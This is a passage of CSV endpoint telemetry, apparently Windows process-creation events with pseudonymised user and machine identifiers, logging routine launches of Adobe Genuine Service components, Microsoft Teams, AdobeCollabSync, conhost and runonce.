19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClientLauncher,AdobeGCClientLauncher.exe,Adobe Genuine Launch Utility
+1243,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:51:11.562299700+00:00,4108,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,aba44041ab85b375a2d7a06b3e32bf84,eff994171e80a7d59637b48cf2d338399c468dc245ad8a7cb56d4d15bdc7dc89,791e623973adcbe6888602ae5314180c62f78677,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:51:11.554830300+00:00,17436,Adobe Genuine Launcher.exe,"""Adobe Genuine Launcher.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a09952"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a09952""",False,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:51:11.592697600+00:00,2021-06-25 00:51:41.842588900+00:00,af8dd401-1fdb-4244-b8f2-b95e62a3d504,computerpii_0a470890c60768167990033d701e7bd881398861,181993,False,10.7740.19041.1052,False,11540474045178494,,11540474045178496,2021-06-25 00:51:11.554830300+00:00,17436,2021-06-25 00:51:11.554830300+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\Adobe Genuine Launcher.exe,17436,18560,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,323272,2021-02-17 03:19:42+00:00,2021-02-16 19:38:26+00:00,2021-06-25 00:51:11.576013800+00:00,2020-09-22 19:30:00+00:00,18688,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClientLauncher,AdobeGCClientLauncher.exe,Adobe Genuine Launch Utility,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1244,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:51:11.603497500+00:00,9544,AdobeGCClient.exe,"""AdobeGCClient.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a09952"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a09952""",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AdobeGCClient.exe,6743752,99b696fe03a14bd322f39fc35827e487,b57aab0a87e6c85ddf061a0a10bc10b96c61ae827fbb61f514a1df9fffcf263f,43d2475f42eeacb434b632975a33ebc8979a95b3,aba44041ab85b375a2d7a06b3e32bf84,eff994171e80a7d59637b48cf2d338399c468dc245ad8a7cb56d4d15bdc7dc89,791e623973adcbe6888602ae5314180c62f78677,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:51:11.554830300+00:00,17436,Adobe Genuine Launcher.exe,"""Adobe Genuine Launcher.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a09952"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a09952""",False,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:51:11.676094500+00:00,2021-06-25 00:51:41.842636800+00:00,502c2b6c-98c3-4d35-8bca-a617255f2898,computerpii_0a470890c60768167990033d701e7bd881398861,181994,False,10.7740.19041.1052,False,11540474045178494,,11540474045178497,2021-06-25 00:51:11.554830300+00:00,17436,2021-06-25 00:51:11.554830300+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\Adobe Genuine Launcher.exe,17436,16512,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,323272,2021-02-17 03:19:42+00:00,2021-02-16 19:38:26+00:00,2021-06-25 00:51:11.576013800+00:00,2020-09-22 19:30:00+00:00,18688,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClientLauncher,AdobeGCClientLauncher.exe,Adobe Genuine Launch Utility,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClient,AdobeGCClient.exe,Adobe GC Client Application
+1245,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:39.754689300+00:00,1564,Teams.exe,"""Teams.exe"" --system-initiated",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,958472658892e02affb3c43d2a7ad030,76c4854a36d8cf22fb14f2f61d00013820a1b7431f9a896a0b29af8a8748e842,934d0f53972cb7896f39019b5f79d835cc413f26,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:38.356200500+00:00,14744,Update.exe,"""Update.exe"" --processStart ""Teams.exe"" --process-start-args ""--system-initiated""",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:39.818700100+00:00,2021-06-23 00:52:50.747778300+00:00,0cc2fd2f-54b6-4d12-b709-76e3dd79b27e,computerpii_0a470890c60768167990033d701e7bd881398861,154731,False,10.7740.19041.1052,False,11540474045171812,,11540474045171817,2021-06-23 00:51:38.356200500+00:00,14744,2021-06-23 00:51:38.356200500+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,14744,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams,2454184,2021-02-19 03:38:00+00:00,2021-05-18 01:04:27.365665+00:00,2021-06-23 00:51:38.374843100+00:00,2020-11-11 01:26:36.505424500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.10.63.0,Update.exe,Update.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+1246,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:40.351037500+00:00,3584,AdobeCollabSync.exe,"""AdobeCollabSync.exe"" ",PortableExecutable,2021-05-28 05:59:00+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe,5549280,77b989aab779490036bd3e4726bbef86,59c90ae4846f8e491c2a5aca0ac32e17e275a7f5beb5e3ac7aa09546e760cc45,77e0aac688d8e540f63fd490473b2570587a5ba4,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:19.951048300+00:00,11452,explorer.exe,Explorer.EXE,False,2021-06-23 00:51:19.663301200+00:00,18268,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:40.389530200+00:00,2021-06-23 00:52:50.748199500+00:00,0baa75f1-6b8c-423e-b645-71315d257f69,computerpii_0a470890c60768167990033d701e7bd881398861,154741,False,10.7740.19041.1052,False,11540474045171770,,11540474045171819,2021-06-23 00:51:19.951048300+00:00,11452,2021-06-23 00:51:19.951048300+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,11452,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-23 00:51:19.952611900+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,20481.0,1.0,1.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,,,,,,
+1247,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:40.411672900+00:00,20344,AdobeCollabSync.exe,"""AdobeCollabSync.exe""  --type=collab-renderer --proc=3584",PortableExecutable,2021-05-28 05:59:00+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe,5549280,77b989aab779490036bd3e4726bbef86,59c90ae4846f8e491c2a5aca0ac32e17e275a7f5beb5e3ac7aa09546e760cc45,77e0aac688d8e540f63fd490473b2570587a5ba4,77b989aab779490036bd3e4726bbef86,59c90ae4846f8e491c2a5aca0ac32e17e275a7f5beb5e3ac7aa09546e760cc45,77e0aac688d8e540f63fd490473b2570587a5ba4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:40.351037500+00:00,3584,AdobeCollabSync.exe,"""AdobeCollabSync.exe"" ",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:40.498415200+00:00,2021-06-23 00:52:50.748462800+00:00,be8f404d-609f-4636-b6f4-3ab745a09a57,computerpii_0a470890c60768167990033d701e7bd881398861,154748,False,10.7740.19041.1052,False,11540474045171819,,11540474045171820,2021-06-23 00:51:40.351037500+00:00,3584,2021-06-23 00:51:40.351037500+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe,3584,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,5549280,2021-05-28 03:22:03+00:00,2021-05-28 05:59:00+00:00,2021-06-23 00:51:40.344784400+00:00,2021-05-28 05:59:00+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+1248,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:40.825938100+00:00,19368,runonce.exe,runonce.exe /Run6432,PortableExecutable,2021-02-17 04:35:32.235216+00:00,C:\Windows\SysWOW64\runonce.exe,47104,7430ccc7226a6ff76b6d55b96f6ce53c,0babaeacf9d0aa4e6fbea6943b9916425746fb702b6501c47f4470fd195836af,49b01fd1a1590320332c8c766c098bae6b1c01dd,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:19.951048300+00:00,11452,explorer.exe,Explorer.EXE,False,2021-06-23 00:51:19.663301200+00:00,18268,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:40.915964900+00:00,2021-06-23 00:52:50.748696+00:00,3bb0c009-ea45-4a4f-bc76-cc69e4fe4577,computerpii_0a470890c60768167990033d701e7bd881398861,154755,False,10.7740.19041.1052,False,11540474045171770,,11540474045171821,2021-06-23 00:51:19.951048300+00:00,11452,2021-06-23 00:51:19.951048300+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,11452,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-23 00:51:19.952611900+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,20481.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,RunOnce,RUNONCE.EXE,Run Once Wrapper
+1249,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:40.934107600+00:00,3344,Teams.exe,"""Teams.exe"" --type=gpu-process --field-trial-handle=1776,6404088009311199867,3082750514405554529,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --electron-shared-settings=eyJ********** --gpu-preferences=KAAAAAAAAADgAAAwAAAAAAAAYAAAAAAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --mojo-platform-channel-handle=1788 --ignored="" --type=renderer "" /prefetch:2",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:39.754689300+00:00,1564,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-23 00:51:38.356200500+00:00,14744,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:40.981057800+00:00,2021-06-23 00:52:50.748798300+00:00,8e9828df-4239-479b-a9fd-3b70281f2045,computerpii_0a470890c60768167990033d701e7bd881398861,154758,False,10.7740.19041.1052,False,11540474045171817,,11540474045171822,2021-06-23 00:51:39.754689300+00:00,1564,2021-06-23 00:51:39.754689300+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1564,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-23 00:51:39.765150300+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,,384.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+1250,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:41.060639100+00:00,1904,Teams.exe,"""Teams.exe"" --type=utility --field-trial-handle=1776,6404088009311199867,3082750514405554529,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --service-sandbox-type=network --enable-wer --ms-teams-less-cors=522133263 --electron-shared-settings=eyJ********** --mojo-platform-channel-handle=2296 /prefetch:8",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:39.754689300+00:00,1564,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-23 00:51:38.356200500+00:00,14744,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:41.112616+00:00,2021-06-23 00:52:50.748932700+00:00,ebe33ed4-8611-42f7-8836-0ae5991fb5b6,computerpii_0a470890c60768167990033d701e7bd881398861,154762,False,10.7740.19041.1052,False,11540474045171817,,11540474045171823,2021-06-23 00:51:39.754689300+00:00,1564,2021-06-23 00:51:39.754689300+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1564,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-23 00:51:39.765150300+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+1251,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:41.176806800+00:00,12588,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1776,6404088009311199867,3082750514405554529,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --enable-sandbox --native-window-open --preload=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar\lib\renderer\FilePII_b3dffdae7daffa46d23ed7197baff899565e8592.js"" --background-color=#fff --enable-websql --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2468 /prefetch:1 --msteams-process-type=loadingWindow",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:39.754689300+00:00,1564,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-23 00:51:38.356200500+00:00,14744,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:41.235143800+00:00,2021-06-23 00:52:50.749031300+00:00,52b24143-c96d-4de2-8c7a-b16f7e7fd196,computerpii_0a470890c60768167990033d701e7bd881398861,154765,False,10.7740.19041.1052,False,11540474045171817,,11540474045171824,2021-06-23 00:51:39.754689300+00:00,1564,2021-06-23 00:51:39.754689300+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1564,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-23 00:51:39.765150300+00:00,2021-05-18 